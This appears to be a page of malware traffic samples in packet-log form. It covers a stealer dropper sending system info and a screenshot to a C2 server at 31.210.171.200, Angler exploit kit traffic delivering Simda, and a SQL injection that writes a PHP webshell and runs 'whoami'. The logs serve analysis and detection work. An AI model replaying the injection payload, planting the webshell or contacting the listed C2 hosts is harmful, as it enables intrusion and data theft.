
POST /gate/log.php 31.210.171.200 Malware Dropper Trojan Downloader PCAP File Download Traffic Sample

2019-05-29 23:39:48.912311 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3097589712:3097590130, ack 2503829794, win 16425, length 418: HTTP: GET /1.exe HTTP/1.1
E…..@…..
.
.
.
.. .P..w..=i”P.@)….GET /1.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-29 23:39:49.588931 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 109501:110961, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
.
.
..P. .?….yrP…….@……….t…..H.F………82A……..F…..”A..7….X.F…..”A..&….d.F.3.ZYYd..h..A………]…d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F.p…d.F.q…d.F.r…d.F.s…d.F.t…d.F.u…
d.F.v…d.F.w…d.F.x…d.F.y…d.F.z…d.F.{…d.F.|…d.F.}…d.F.~…d.F…..d.F.`…d.F.a…d.F.b…d.F.c…d.F.d…d.F.e…d.F.f…d.F.g…d.F.h…d.F.i…d.F.j…d.F.k…d.F.l…d.F.m…d.F.n…d.F.o…d.F.P…d.F.Q…d.F.R…d.F
.S…d.F.T…d.F.U…d.F.V…d.F.W…d.F.X…d.F.Y…d.F.Z…d.F.[…d.F….d.F.]…d.F.^…d.F._…d.F.@…d.F.A…d.F.B…d.F.C…d.F.D…d.F.E…d.F.F…d.F.G…d.F.H…d.F.I…d.F.J…d.F.K…d.F.L…d.F.M…d.F.N…d.F.O…d.F.0.
..d.F.1…d.F.2…d.F.3…d.F.4…d.F.5…d.F.6…d.F.7…d.F.8…d.F.9…d.F.:…d.F.;…d.F.<…U..3.Uh..A.d.0d. ….F.3.ZYYd..h..A…6…..]….-..F…..A…TColor……….@.4.A………………………..4.A…..@w@..;@..;@..;@.. <@..;@.(9@.D9@..9@..EInvalidGraphic..A………………………….A…..@w@..;@..;@..;@..<@..;@.(9@.D9@..9@..EInvalidGraphicOperation.@…A.. TFontPitch………..A. fpDefault fpVariable.fpFixed.Graphics…A. TFontName…A…TFontCharset………. .A.. TFontStyle………..A..fsBold.fsItalic.fsUnderline.fsStrikeOut.Graphics..p.A…TFontStyles…A…..A.. TPenStyle………..A..psSolid.psDash.psDot psDashDot.psDashDotDot.psClear.psInsideFrame.Graphics…A…TPenMode………..A..p mBlack.pmWhite.pmNop.pmNot.pmCopy pmNotCopy.pmMergePe
2019-05-29 23:39:49.590576 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 173741:175201, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
2019-05-29 23:40:00.458551 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 1054931223:1054931413, ack 2808420310, win 16425, length 190: HTTP: POST /gate/log.php HTTP/1.1
E…..@…..
.
……$.P>….e..P.@)….POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 31.210.171.200

2019-05-29 23:40:00.458560 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 190:345, ack 1, win 16425, length 155: HTTP
E…..@…..
.
……$.P>….e..P.@).2..params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw=
2019-05-29 23:40:00.724098 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.o@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate","attachment_url":"http://31.210.171.200/gate/sqlite3.dll","libraries":"http://31.210.171.200/gate/libs.zip","ip":"73.135.186.44","config":{"masks":null,"loader_urls":null}}
0

2019-05-29 23:40:01.027541 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.p@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate","attachment_url":"http://31.210.171.200/gate/sqlite3.dll","libraries":"http://31.210.171.200/gate/libs.zip","ip":"73.135.186.44","config":{"masks":null,"loader_urls":null}}

2019-05-29 23:40:01.135113 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 2907559582:2907559879, ack 1455228641, win 16425, length 297: HTTP: GET /gate/sqlite3.dll HTTP/1.1
E..Q..@….Q
.
……%.P.M..V…P.@)i…GET /gate/sqlite3.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:03.662144 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 297:591, ack 917003, win 65335, length 294: HTTP: GET /gate/libs.zip HTTP/1.1
E..N..@….V
.
……%.P.M..V…P..7B…GET /gate/libs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:05.273384 IP 31.210.171.200.80 > 10.1.10.162.49189: Flags [P.], seq 3744744:3745578, ack 591, win 245, length 834: HTTP
E .j..@.4…….
.
..P.%V...M..P…8P……..znN..i..(..8G….$……. …G.).api-ms-win-core-file-l2-1-0.dll . ………d0.^....R^%.....R^%....PK...........znNB.p.a(..8G..!.$....... ...Z.*.api-ms-win-core-handle-l1-1-0.dll . .........nW.^…..^%……^%….PK………..znN ..q.)..8G….$……. ….?.api-ms-win-core-heap-l1-1-0.dll
. ………nW.^...G._%....G._%....PK...........znN...##'...E..&.$....... ...:i*.api-ms-win-core-interlocked-l1-1-0.dll . ..........~.^…y.%….y.%….PK………..znNL…J)..8I..(.$……. …...api-ms-win-core-libraryloader-l1-1-0.dll . ……….~.^.....%……%....PK...........znN.....+..8Q..'.$....... ...1.*.api-ms-win-core-localization-l1-2-0.dll . ............^….N%.....N%….PK………..znN1….)..8I..!.$……. …?..api-ms-win-core-memory-l1-1-0.dll
. …………^.....%……`%….PK……:.:.t…..+…
2019-05-29 23:40:14.608543 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 345:689, ack 567, win 16283, length 344: HTTP: POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
E….a@…..
.
……$.P>..p.e..P.?…..POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu
Content-Length: 63918
Host: 31.210.171.200

2019-05-29 23:40:15.012041 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 63469:64607, ack 567, win 16283, length 1138: HTTP
E…..@…..
.
……$.P>….e..P.?.f…….8..b..Hl
.giT…BX:..D..7Y%3.4
…~$Z.8….K.u6.T………H….0}………….](..J.wK..b.Is…..@..}……….}o…..h..j..HP.JT.”..’B.A_u.hn”..S…;..R;..!.
-.fual[.MZ.L.qn.W.s.9.t=….C..S.=…@.M…fW4,w..4y.d-…/…….T..bf.2M…….eWoh…,./….;?+.S.PP.C...I.........K....[ RM.q. jTx.x... 8:W<!.+..j.4..(....W...."..O.......zD^.].....[..i..F.=.B..0.1.>..1..'...J.........0V..5.. c..._..3..>_.../ ..+N..X...v.H..R.....{I,..u..Z.^..\.E.$. ~...[5. ^o...P.bY.h.......w...$+.~t..57.0g...e.V%Q.R..M3..fm-1...]o+.x.F....E....W.......R.W.(..|.......<b.8..}7..:.>...srt6.r.....B.. U?V.$y.{..{..(..7.....r&%..u)D.V.C]..." ..y...&]7......@.%t&.{W. UZZ..#.....K.N..N@.;....o{...W.yl..E>.xT.D.^._...'9.p.Qw.?.....1V=..M...{W.vr)Tg.....Sp...g.....+."..............e...U...{...D0iZ...,.... ...].G2.......K …#….E.l.]..UN.v)……W gt.c..f}.Q….]..)6.…]..0………Fi.{ 4a&K……..6#…….nK.’.;……U..Z……e.|.Yb…’….z…..GVRI.F.8…PK………….NF.i……….. ……. …….System Info.txtUT….4.\PK………….N….Z…….
. ……. …….screen.pngUT….4.\PK…………..n…..
--Jfbvjwj3489078yuyetu--
2019-05-29 23:40:15.573069 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 567:793, ack 64607, win 1252, length 226: HTTP: HTTP/1.1 200 OK
E .
..@.4…….
.
..P.$.e..>..vP….v..HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:15 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

d
true"success"
0

Angler Exploit Kit EK Delivers Simda Malware Banking Trojan PCAP File Download Traffic Sample

2015-03-27 11:14:44.276370 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(.A@….O..z”..D..).P.Cy…..P………….
2015-03-27 11:14:44.283482 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 1:356, ack 1, win 256, length 355: HTTP: GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
E….K@…….z”..D..).P.Cy…..P….;..GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: [[[[[[[[[ redacted ]]]]]]]]]]
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive

2015-03-27 11:14:44.539699 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], ack 356, win 123, length 0

2015-03-27 11:14:46.115369 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 95637, win 256, length 0
E..(..@…….z”..D..).P.C{…5 P…y………
2015-03-27 11:14:47.983190 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 356:767, ack 95637, win 256, length 411: HTTP: GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
E…..@…….z”..D..).P.C{…5 P…Ba..GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://kiyoshi.noahsbootandshoerepair.com/closers_retrenchment_delineation/6715645798
x-flash-version: 13,0,0,182
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive


2015-03-27 11:14:48.180800 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(..@….v..z”..D..6.P…5..BDP….”……..
2015-03-27 11:14:48.181788 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [P.], seq 1:133, ack 1, win 256, length 132: HTTP: GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
E…..@…….z”..D..6.P…5..BDP…….GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
Connection: Keep-Alive
Host: kiyoshi.noahsbootandshoerepair.com

2015-03-27 11:14:48.207298 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], seq 95637:97004, ack 767, win 131, length 1367: HTTP: HTTP/1.1 200 OK
E….&@.2.X…D…z”.P.)..5 .C|.P…e…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 27 Mar 2015 15:14:48 GMT
Content-Type: application/x-shockwave-flash

Content-Length: 52272

2015-03-27 11:14:52.508197 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [.], ack 1, win 256, length 0
E..(..@….[..z”.q…C.P=.,.u..RP….a……..
2015-03-27 11:14:52.509414 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [P.], seq 1:101, ack 1, win 256, length 100: HTTP: POST /timezone/0/0 HTTP/1.1
E…..@…….z”.q…C.P=.,.u..RP…I#..POST /timezone/0/0 HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.earthtools.org

2015-03-27 11:14:52.845296 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [.], ack 101, win 115, length 0
E..(7E@./.&..q….z”.P.Cu..R=.,iP..s….
2015-03-27 11:14:52.845577 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [P.], seq 1:696, ack 101, win 115, length 695: HTTP: HTTP/1.1 200 OK
E…7F@./.#..q….z”.P.Cu..R=.,iP..s….HTTP/1.1 200 OK

Date: Fri, 27 Mar 2015 15:14:52 GMT

2015-03-27 11:14:53.309622 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [.], ack 1, win 256, length 0
E..(..@…k…z”.%8..D.P/……SP…O………
2015-03-27 11:14:53.310410 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [P.], seq 1:126, ack 1, win 256, length 125: HTTP: POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
E…..@…j…z”.%8..D.P/……SP…X…POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.ecb.europa.eu

2015-03-27 11:14:53.478277 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], ack 126, win 457, length 0
E..(..@.9..F.%8…z”.P.D…S/…P…N…
2015-03-27 11:14:53.578255 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], seq 1:1368, ack 126, win 457, length 1367: HTTP: HTTP/1.1 200 OK
E…..@.9….%8…z”.P.D…S/…P…f…HTTP/1.1 200 OK

Server: Apache/2.2.3 (Linux/SUSE)

2015-03-27 11:14:58.577462 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@….{..z”U.h..L.P.B.~6t..P…Ik……..
2015-03-27 11:14:58.578833 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..L.P.B.~6t..P….Y..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 216
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:14:58.579133 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 136:352, ack 1, win 256, length 216: HTTP
E…..@…….z”U.h..L.P.B..6t..P…k…SNE1dax2kTrCO0/dykZ+x8JvoeshsqxF8Bud4at1aDiBWU9qB6+uhOMFH98SexCc+vJywoAb8HQv8VDbLgLc25bZvceJUzuvnAqW58q0Pwbl5Z2luX50C3YR+Ef3gJUBFHY5k6LtQ0Uxou9+4TQEZzORJaqZn7WT9wqKE1eM8LYMnmPmnpobOT6M3r+PF5oJnTmoAQ1EthyxMm7LjPYf2g==

2015-03-27 11:14:58.778906 IP 85.25.104.159.80 > 192.168.122.34.49228: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:00.349286 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@….@..z”U.h..N.P…H.1..P….i……..
2015-03-27 11:15:00.350212 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..N.P…H.1..P….R..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 172
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:00.350542 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 136:308, ack 1, win 256, length 172: HTTP
E…..@…….z”U.h..N.P…..1..P…….YD4viggOIh++07v2Um1gIx11St/8XC8saF5uX0YI4AMVOHQ25cUjc+t23u3BZI27fiaqpkXY6wVteS6MqFLJlvHwM6fGGZVitbFgc8uerOJBrGG5iaFm5jNsDn5NWX3yyd0SwE47HcjkQ1DdnT7on0O8tT20+FuDVEr4npZm0eE=

2015-03-27 11:15:00.643584 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:03.031960 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 513599, win 1368, length 0
E..(..@….K..z”U.h..N.P…{.9..P..X……….
2015-03-27 11:15:03.227353 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 308:443, ack 513599, win 1368, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..N.P…{.9..P..X….POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 256
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:03.227511 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 443:699, ack 513599, win 1368, length 256: HTTP
E..(..@….I..z”U.h..N.P…..9..P..X….GpbZQGaQgmfu/Eh0mvebAJPknXzYE1Vhzceud0DQnHPICCkYG2flJ1aMWtq5BMcqrPr7wo7Fr53uEdowJXndCecd5Aj+eFv4Wsy43MaZDqFqB2/ld1bLXKa8U5EUlr8hLOsU8Q/e3pN/wf2SWbmmm5Rci6Hw1izzlJ/rY8zpaDl3n3E2sBtF6EX0+M1Eu4cE82G4ZcE3qY2Ld94kApgQVjW/Wu5p26YOwUZB2mTcGnM0AT0qyJzKE77lTaBJkHH1

2015-03-27 11:15:03.427513 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 443, win 140, length 0

2015-03-27 11:15:09.727441 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [.], ack 1, win 256, length 0
E..(..@…….z”…..Y.P…Gv.”.P………….
2015-03-27 11:15:09.727832 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [P.], seq 1:407, ack 1, win 256, length 406: HTTP: POST /news.php HTTP/1.0
E…..@…….z”…..Y.P…Gv.”.P…….POST /news.php HTTP/1.0
Host: fasion.arunthati.co.uk
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 698
Content-Type: application/octet-stream

2015-03-27 11:15:21.224812 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 834:1562, ack 742017, win 2002, length 728: HTTP
E…..@…….z”U.h..N.P…..=.GP…….GMXiXd49B5iwJApbnju5S7TSL4CBU0EaU8l0WQKCbWg7hAyhzQilFMKgOwfKOy6G0/g37ipDdpYCEc8PJiUaJv+IFR1a1HXiPDWzFglXeTnP7pjbGUKS9K0PXA1Uo1UZW6VEoKRn+ZuxvM3BRRdgzEM5CkIH42ZpivDhVkCJ4P6Fqp+v1Uz2f9aZgRrnxA62Gds9itsbdKPYGT5K1fBQ6Wj0DQpkzb8c+eC00w5gKkNTQFDdq12qhpnydU5RL3j05yepKyu42ZnRDyd8UL8nKYIX6cvW5XczXGHFk1egZtjW++YmsVW0A4c5mpPT+PRLb9keLQRqWKcLW+RCozgBstim7ha1Uxrer1RcT/FG+UUrzkybT57eDfTeZQJLRsti4ahtlgyCqMDCmACszLGlxrcK0xwFAoZ40HHqwL561H815gEsuwcrzrE/C1t2quC9AHtRWPE4jgy8VMFRRJ1EQzjBxNCayGsFGb+V/qvImKrK4hic42Q+32icspNkz36X6+bgARY0aQhQkru0lGh6e88mNvt+EIpim5UJDxgGHDpdT5KPK8ZNEC66aHNcieJgnUnXspdClizeGvuZ7TUCgWey/VOnkedLfJQrIgWunOqVTEQzpJZrBH1px1fajjriHVCy7aj+KcF2C1MLibl1xptPqfKNinoKDEG3SPjZiHkj5rwFy+bP6AcEGER4/TYvrUovM6nBajbHIQF3C7Iezw==

2015-03-27 11:15:21.368855 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 834, win 156, length 0

2015-03-27 11:18:03.853669 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( ‘@…….z”N.k…P..;x.R..P…)………
2015-03-27 11:18:03.854165 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… (@….#..z”N.k…P..;x.R..P….x..GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:04.090363 IP 85.25.107.67.80 > 192.168.122.34.49245: Flags [S.], seq 307298518, ack 567770301, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.0.D.U.kC..z”.P.].Q..!.|…r……..W…….
2015-03-27 11:18:04.090742 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [.], ack 1, win 256, length 0
E..( )@…….z”U.kC.].P!.|..Q..P…AC……..
2015-03-27 11:18:04.091262 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [P.], seq 1:174, ack 1, win 256, length 173: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… *@…….z”U.kC.].P!.|..Q..P…….GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: sandsofafrica.net

2015-03-27 11:18:04.218709 IP 162.244.34.133.80 > 192.168.122.34.49246: Flags [S.], seq 2988324121, ack 1071872369, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.3.<…”…z”.P.^..5.?.yq..r……..W…….
2015-03-27 11:18:04.219113 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( +@….`..z”..”..^.P?.yq..5.P…MT……..
2015-03-27 11:18:04.219642 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [P.], seq 1:171, ack 1, win 256, length 170: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… ,@…….z”..”..^.P?.yq..5.P…….GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: koreandust.com

2015-03-27 11:18:32.826046 IP 192.168.122.34.49263 > 136.243.241.27.80: Flags [P.], seq 1:469, ack 1, win 64249, length 468: HTTP: GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
E… .@…:n..z”…..o.P..N..<1.P….w..GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in/?22504744544b4d4e4356434c5643564b0c414d4f
x-flash-version: 13,0,0,182
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in
Connection: Keep-Alive


2015-03-27 11:18:33.183843 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( .@….>..z”N.k..q.P7AB.ZEr.P………….
2015-03-27 11:18:33.184137 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… .@…….z”N.k..q.P7AB.ZEr.P…)…GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:33.217857 IP 192.168.122.34.52660 > 224.0.0.252.5355: UDP, length 22
E..2 ……4..z”…………^…………wpad…..
2015-03-27 11:18:33.280227 IP 136.243.241.27.80 > 192.168.122.34.49264: Flags [.], ack 552, win 15400, length 0
E..(..@.3………z”.P.p.%..}X-P.<(.n..

2015-03-27 11:18:33.280608 IP 136.243.241.27.80 > 192.168.122.34.49263: Flags [.], seq 12518:13885, ack 469, win 15544, length 1367: HTTP

2015-03-27 11:18:35.340582 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( .@…….z”..”..r.P…..%..P………….
2015-03-27 11:18:35.340943 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [P.], seq 1:326, ack 1, win 256, length 325: HTTP: GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
E..m .@….v..z”..”..r.P…..%..P…g…GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
Accept: */*
Referer: http://newblackfridayads.com/search.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: koreandust.com
Connection: Keep-Alive

Webshell shell.php Command Access SSH Server PCAP Analysis File Download

2018-10-14 12:34:34.199552 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1:334, ack 1, win 229, options [nop,nop,TS val 769026432 ecr 738855], length 333: HTTP: GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET['cmd']);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22--%20 HTTP/1.1
E…XA@.?……2
..d…P…f{J.I…..F…..
-.i…F’GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET['cmd']);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22--%20 HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.199573 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [.], ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 0
E..4.a@.@…
..d…2.P..{J.I……………
..F(-.i.
2018-10-14 12:34:34.202294 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1:996, ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 995: HTTP: HTTP/1.1 200 OK
E….b@.@.|.
..d…2.P..{J.I……………
..F(-.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:34:34.210976 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 334:545, ack 996, win 244, options [nop,nop,TS val 769026434 ecr 738856], length 211: HTTP: GET /docs/shell.php?cmd=whoami HTTP/1.1
E…XC@.?……2
..d…P….{J.,………..
-.i…F(GET /docs/shell.php?cmd=whoami HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.220266 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 996:1295, ack 545, win 2078, options [nop,nop,TS val 738861 ecr 769026434], length 299: HTTP: HTTP/1.1 200 OK
